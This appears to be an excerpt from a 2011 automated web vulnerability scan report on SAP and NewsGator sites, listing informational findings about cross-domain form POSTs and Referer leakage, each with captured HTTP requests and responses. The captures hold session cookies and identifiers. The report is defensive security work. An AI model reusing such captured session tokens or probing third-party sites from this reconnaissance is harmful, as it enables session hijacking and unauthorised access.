Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB002004,9|SOLUTION=BARB003001,9|

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:42:58 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:42:58 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:42:58 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:42:58 GMT
Content-Length: 87533


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
B4GRm9ybUlEKClYU3lzdGVtLkd1aWQsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSRkZWQ2NGUzZi0xNTYwLTQwODMtYTg2Zi01NDM3ODVmODA2ZWYeDVJlZmVycmluZ1BhZ2VlZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WJQUfbW9ialRlbXBsYXRlJG1vYmpIZWFkZXIkbW9iakxuZwUxbW9ialRlbXBsYXRlJG1vYmpNZW51JG1vYmpTZWFyY2hCYXIkcmJDb2xsZWN0aW9uMQUxbW9ialRlbXBsYXRlJG1vYmpNZW51JG1vYmpTZWFyY2hCYXIkcmJDb2xsZWN0aW9uMgUxbW9ialRlbXBsYXRlJG1vYmpNZW51JG1vYmpTZWFyY2hCYXIkcmJDb2xsZWN0aW9uMgUbbW9ialRlbXBsYXRlJGZvcm0kVG9waWNBcmVhBRltb2JqVGVtcGxhdGUkZm9ybSRNZXNzYWdlBR1tb2JqVGVtcGxhdGUkZm9ybSRNZXNzYWdlVGV4dAUdbW9ialRlbXBsYXRlJGZvcm0kQ29udGFjdE1lQnkFHG1vYmpUZW1wbGF0ZSRmb3JtJFNhbHV0YXRpb24FG21vYmpUZW1wbGF0ZSRmb3JtJEZpcnN0TmFtZQUabW9ialRlbXBsYXRlJGZvcm0kTGFzdE5hbWUFHW1vYmpUZW1wbGF0ZSRmb3JtJENvbXBhbnlOYW1lBR5tb2JqVGVtcGxhdGUkZm9ybSRBZGRyZXNzTGluZTEFHm1vYmpUZW1wbGF0ZSRmb3JtJEFkZHJlc3NMaW5lMgUWbW9ialRlbXBsYXRlJGZvcm0kQ2l0eQUcbW9ialRlbXBsYXRlJGZvcm0kUG9zdGFsQ29kZQUXbW9ialRlbXBsYXRlJGZvcm0kUGhvbmUFF21vYmpUZW1wbGF0ZSRmb3JtJEVtYWlsBSNtb2JqVGVtcGxhdGUkZm9ybSRSZWxhdGlvbnNoaXBUb1NBUAUZbW9ialRlbXBsYXRlJGZvcm0kQ291bnRyeQUYbW9ialRlbXBsYXRlJGZvcm0kUmVnaW9uBSFtb2JqVGVtcGxhdGUkZm9ybSRDb250YWN0U2FsZXNSZXAFRm1vYmpUZW1wbGF0ZSRmb3JtJENvbnRhY3RTYWxlc1JlcCQxZmJmZjhlYi00NzAzLTRlNmEtYTJkNC1iOWI4NTU4ZjAzNjcFRm1vYmpUZW1wbGF0ZSRmb3JtJENvbnRhY3RTYWxlc1JlcCQxZmJmZjhlYi00NzAzLTRlNmEtYTJkNC1iOWI4NTU4ZjAzNjcFRm1vYmpUZW1wbGF0ZSRmb3JtJENvbnRhY3RTYWxlc1JlcCRiY2Q0NTJiYi1lNmZiLTQwODQtODUyOC0xNzYyM2NiYmJkMDcFRm1vYmpUZW1wbGF0ZSRmb3JtJENvbnRhY3RTYWxlc1JlcCRiY2Q0NTJiYi1lNmZiLTQwODQtODUyOC0xNzYyM2NiYmJkMDcFHG1vYmpUZW1wbGF0ZSRmb3JtJEVtYWlsT3B0SW4FQW1vYmpUZW1wbGF0ZSRmb3JtJEVtYWlsT3B0SW4kMWZiZmY4ZWItNDcwMy00ZTZhLWEyZDQtYjliODU1OGYwMzY3BUFtb2JqVGVtcGxhdGUkZm9ybSRFbWFpbE9wdEluJDFmYmZmOGViLTQ3MDMtNGU2YS1hMmQ0LWI5Yjg1NThmMDM2NwVBbW9ialRlbXBsYXRlJGZvcm0kRW1haWxPcHRJbiRiY2Q0NTJiYi1lNmZiLTQwODQtODUyOC0xNzYyM2NiYmJkMDcFQW1vYmpUZW1wbGF0ZSRmb3JtJEVtYWlsT3B0SW4kYmNkNDUyYmItZTZmYi00MDg0LTg1MjgtMTc2MjNjYmJiZDA3BRxtb2JqVGVtcGxhdGUkZm9ybSRQaG9uZU9wdEluBUFtb2JqVGVtcGxhdGUkZm9ybSRQaG9uZU9wdEluJDFmYmZmOGViLTQ3MDMtNGU2YS1hMmQ0LWI5Yjg1NThmMDM2NwVBbW9ialRlbXBsYXRlJGZvcm0kUGhvbmVPcHRJbiQxZmJmZjhlYi00NzAzLTRlNmEtYTJkNC1iOWI4NTU4Zj
...[SNIP]...
16. Cross-domain POST  previous  next
There are 2 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

16.1. http://info.newsgator.com/Trial_SocialSites2010.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.newsgator.com
Path:   /Trial_SocialSites2010.html

Issue detail

The page contains a form which POSTs data to the domain app-d.marketo.com. The form contains the following fields:

Request

GET /Trial_SocialSites2010.html?Leadsource=trial HTTP/1.1
Host: info.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.newsgator.com/Default.aspx?tabid=214
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028; __utma=1.930474175.1318692366.1318692366.1318692366.1; __utmb=1.2.10.1318692366; __utmc=1; __utmz=1.1318692366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 200 OK
Date: Sat, 15 Oct 2011 15:29:12 GMT
Server: Apache
Vary: *,Accept-Encoding
Content-Length: 59212
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-200000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" la
...[SNIP]...
</script>
<form class="lpeRegForm formNotEmpty" method="post" enctype="application/x-www-form-urlencoded" action="http://app-d.marketo.com/index.php/leadCapture/save" id="mktForm_21" name="mktForm_21"><ul class='mktLblLeft'>
...[SNIP]...
16.2. http://weblogs.sdn.sap.com/pub/t/27  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/t/27

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /pub/t/27 HTTP/1.1
Host: weblogs.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://weblogs.sdn.sap.com/pub/t/27
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:24:36 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 84360

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: SAP TechEd</tit
...[SNIP]...
</p>


<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=SDNWeblogs_SapTeched', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">

<p class="sapTxtSml">
...[SNIP]...
17. Cross-domain Referer leakage  previous  next
There are 44 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

17.1. http://forums.sdn.sap.com/forum.jspa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.sdn.sap.com
Path:   /forum.jspa

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /forum.jspa?forumID=209&start=0 HTTP/1.1
Host: forums.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0OTYtMTMzMDdGODdCMzgtMzg4MkJEODQ2QTg5MDQzRA==
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
SDN_FORUM: 209
SDN_CATEGORY: 6
Content-Length: 45518
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:24:45 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
   <!-- SDN Forums generated page -->
       <title>SAP Community Network Forums: SAP Tec
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="last"><a target="_blank" href="http://store.businessobjects.com/store/bobjects/Content/pbPage.sap_countryselector/pgm.76865500?_s_icmp=CG4D7A6D69">Store</a>
...[SNIP]...
<td>
        <a href="http://www.jivesoftware.com/poweredby/" target="_blank">Powered by Jive Software</a>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="http://sap.112.2o7.net/b/ss/sapsuite2/1/H.21--NS/0"
height="1" width="1" border="0" alt="" /></a>
...[SNIP]...
17.2. http://forums.sdn.sap.com/thread.jspa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.sdn.sap.com
Path:   /thread.jspa

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /thread.jspa?threadID=2059162&tstart=0 HTTP/1.1
Host: forums.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://forums.sdn.sap.com/thread.jspa?threadID=2059162&tstart=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; saplb_*=(J2EE4806300)4806350; JSESSIONID=(J2EE4806300)ID1639050650DB01113137619370041883End; SDNSTATE_FRM=2523140268.14340.0000; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690501070%3B%20pe%3Dno%2520value%7C1318690501073%3B%20c3%3Dno%2520value%7C1318690501076%3B%20s_nr%3D1318688701080-New%7C1321280701080%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292301082%3B%20s_visit%3D1%7C1318690501083%3B%20gpv_p47%3D1%7C1318690501086%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3Dsapcommunity%252Csapglobal%253D%252526pid%25253Dscn%2525253Aglo%2525253Aforums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//forums.sdn.sap.com/thread.jspa%2525253FthreadID%2525253D2059162%25252526tstart%2525253D0%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0OTYtMTMzMDdGODc0QjgtRkE1N0NBOTJEOENDOEJBQQ==
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
SDN_FORUM: 209
SDN_CATEGORY: 6
SDN_THREAD: 2059162
SDN_MESSAGE: 10731664
Content-Length: 21892
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:24:43 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
   <!-- SDN Forums generated page -->
       <title>SAP Community Network Forums: SAP SEC
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS"
href="http://forums.sdn.sap.com/rss/rssmessages.jspa?threadID=2059162">


           <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="last"><a target="_blank" href="http://store.businessobjects.com/store/bobjects/Content/pbPage.sap_countryselector/pgm.76865500?_s_icmp=CG4D7A6D69">Store</a>
...[SNIP]...
<td>
        <a href="http://www.jivesoftware.com/poweredby/" target="_blank">Powered by Jive Software</a>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="http://sap.112.2o7.net/b/ss/sapsuite2/1/H.21--NS/0"
height="1" width="1" border="0" alt="" /></a>
...[SNIP]...
17.3. http://info.newsgator.com/Trial_SocialSites2010.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.newsgator.com
Path:   /Trial_SocialSites2010.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Trial_SocialSites2010.html?Leadsource=trial HTTP/1.1
Host: info.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.newsgator.com/Default.aspx?tabid=214
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028; __utma=1.930474175.1318692366.1318692366.1318692366.1; __utmb=1.2.10.1318692366; __utmc=1; __utmz=1.1318692366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 200 OK
Date: Sat, 15 Oct 2011 15:29:12 GMT
Server: Apache
Vary: *,Accept-Encoding
Content-Length: 59212
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-200000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" la
...[SNIP]...
<link id="APortals__default_Skins_NewsGator_" rel="stylesheet" type="text/css" href="http://www.newsgator.com/Portals/_default/Skins/NewsGator/skin.css" />
<script src="http://newsgator-com.staging.maddevelopment.com/Resources/Shared/Scripts/jquery/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://tracker.marinsm.com/tp?act=1&cid=559f7m7161&script=no" >
</noscript>
...[SNIP]...
<div class="twitter"><a href="http://twitter.com/newsgator"><img align="absmiddle" src="/rs/newsgator/images/icon-twitter-blue.gif" />
...[SNIP]...
</div>
<script type="text/javascript" src="http://munchkin.marketo.net/js/munchkin.js"></script>
...[SNIP]...
17.4. http://reservoir.marketstudio.net/reservoir  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://reservoir.marketstudio.net
Path:   /reservoir

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /reservoir?d=http%3A%2F%2Fstore.businessobjects.com%2Fstore%2Fbobjamer%2FDisplayHomePage%2Fpgm.+77298800%3F_s_icmp%3DCG4DA4BC51%26resid%3D__RESID__%26rests%3D1318689037443&t=commerce&p=globalcommerce&p1=bobjamer&p2=40461809026&p3=newsession HTTP/1.1
Host: reservoir.marketstudio.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RESID=TmOIUAoBAlUAAARDMJwAAAAN

Response

HTTP/1.1 302 Found
Date: Sat, 15 Oct 2011 14:30:39 GMT
Server: Apache
X-Server-Name: resweb@dc1web53
Set-Cookie: RESID=TmOIUAoBAlUAAARDMJwAAAAN; path=/; domain=marketstudio.net; expires=Sun, 20-Oct-2030 01:09:39 GMT
Location: http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800?_s_icmp=CG4DA4BC51&resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1318689037443
Content-Length: 339
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800?_s_icmp=CG4DA4BC51&amp;resid=TmOIUAoBAlUAAARDMJwAAAAN&amp;rests=1318689037443">here</a>
...[SNIP]...
17.5. http://smepartnerfinder.sap.com/FlashIFrame.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://smepartnerfinder.sap.com
Path:   /FlashIFrame.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /FlashIFrame.aspx?lang=en HTTP/1.1
Host: smepartnerfinder.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://smepartnerfinder.sap.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fwlg%2f26917; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690710|check#true#1318688910; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; ASP.NET_SessionId=3mmip455whoq0f55gcf2phvg

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:27:46 GMT
Content-Length: 2300


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   
   <head><title>

</tit
...[SNIP]...
<br />
               <a href='http://www.adobe.com/go/getflashplayer'><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" style="border: 0px;" /></a>
...[SNIP]...
17.6. http://store.businessobjects.com/DRHM/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.businessobjects.com
Path:   /DRHM/store

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /DRHM/store?Action=DisplayProductDetailsPage&SiteID=bobjamer&Locale=en_US&Env=BASE&parentCategoryID=57065700&categoryID=57066300&productID=231860100 HTTP/1.1
Host: store.businessobjects.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://store.businessobjects.com/DRHM/store?Action=DisplayProductDetailsPage&SiteID=bobjamer&Locale=en_US&Env=BASE&productID=231860300&parentCategoryID=57065700&categoryID=57066300&_s_icmp=CG4E7A594
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORA_WX_SESSION="10.1.2.194:260-0#0"; JSESSIONID=0A6E08D05288243D3676FD314938750B; VISITOR_ID=971D4E8DFAED43679E246899D1DA9F034AAC40FA94AD0B51; bobjamer.pgm=" 77298800"; BIGipServerp-drh-dc1pod5-pool1-active=3254911242.260.0000; fcOOS=fcOptOutChip=undefined; fcR=http%3A//www.sap.com/index.epx; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; style=null; extcmp=null; fcP=C=0&T=1318689061488&DTO=1318689060945&U=2033968180&V=1318689071622; mbox=check#true#1318689134|session#1318689062767-959486#1318690934|PC#1318689062767-959486.19#1319898674; s_pers=%20s_ttc%3D1318688493%7C1350225062924%3B%20v36%3D%255B%255B%2527CG4DA4BC51%2527%252C%25271318689062905%2527%255D%252C%255B%2527CG4E7A594%2527%252C%25271318689073781%2527%255D%255D%7C1476541873780%3B%20c13%3Destores%253Aus%253Aproduct%2520page%253A231860300%7C1318690909272%3B%20pe%3DprodView%252Cevent18%7C1318690909274%3B%20c3%3Dno%2520value%7C1318690909280%3B%20s_nr%3D1318689109286-New%7C1321281109286%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292709289%3B%20s_visit%3D1%7C1318690909291%3B%20gpv_p47%3Dno%2520value%7C1318690909293%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20v13%3DCG4E7A594%3B%20s_sq%3Dsapglobal%252Csapsuite1%252Csapvbuus%253D%252526pid%25253Destores%2525253Aus%2525253Aproduct%25252520page%2525253A231860300%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//store.businessobjects.com/DRHM/store%2525253FAction%2525253DDisplayProductDetailsPage%25252526SiteID%2525253Dbobjamer%25252526Locale%2525253D%252526ot%25253DA%3B; fcPT=http%3A//store.businessobjects.com/DRHM/store%3FAction%3DDisplayProductDetailsPage%26SiteID%3Dbobjamer%26Locale%3Den_US%26Env%3DBASE%26productID%3D231860300%26parentCategoryID%3D57065700%26categoryID%3D57066300%26_s_icmp%3DCG4E7A594; fcC=X=C2033968180&Y=1318689071777&FV=10&H=1318689071622&fcTHR=store.businessobjects.com}www.businessobjects.com&Z=1&E=8823527&F=0&I=1318689109320

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Set-Cookie: ORA_WX_SESSION="10.1.2.194:260-0#0"; path=/
Set-Cookie: ORA_WX_SESSION="10.1.2.194:260-0#0"; path=/
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=177811556851,0)
